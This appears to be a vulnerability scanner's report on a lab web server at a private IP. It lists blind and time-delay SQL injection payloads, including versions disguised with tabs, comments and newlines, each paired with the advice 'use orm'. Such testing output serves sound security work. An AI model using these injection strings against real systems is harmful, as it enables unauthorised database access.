Target: http://192.168.42.133 (GET)

---
URL:http://192.168.42.133/sqli/example2.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'63187'='63187
'	and	'53945'='53945
'	or	73885=73885#
'	and	'52547'='52548
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example1.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'63187'='63187
'	and	'53945'='53945
'	or	73885=73885#
'	and	'52547'='52548
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example4.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 	and	97420=97420
	and	96463=96463
	or	74071=74071#
	and	33995=33996
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example5.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 	and	97420=97420
	and	96463=96463
	or	74071=74071#
	and	33995=33996
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example6.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 	and	97420=97420
	and	96463=96463
	or	74071=74071#
	and	33995=33996
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example3.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '/**/and/**/'41449'='41449
'/**/and/**/'1867'='1867
'/**/or/**/1269=1269#
'/**/and/**/'81188'='81189
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example7.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 
and
12168=12168

and
63910=63910

or
95790=95790#

and
54677=54678
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/xml/example2.php (GET)
VulnName: blind sqli
Query: {'name': 'hacker'}
Payload: '+and+'29821'='29821
'+and+'40657'='40657
'+or+81971=81971#
'+and+'90972'='90973
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example8.php (GET)
VulnName: time delay sqli vuln
Query: {'order': 'name'}
Payload: ` or SLEEP(3);-- 
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example9.php (GET)
VulnName: time delay sqli vuln
Query: {'order': 'name'}
Payload:  or SLEEP(3);-- 
Advice: use orm
Database: unknown
---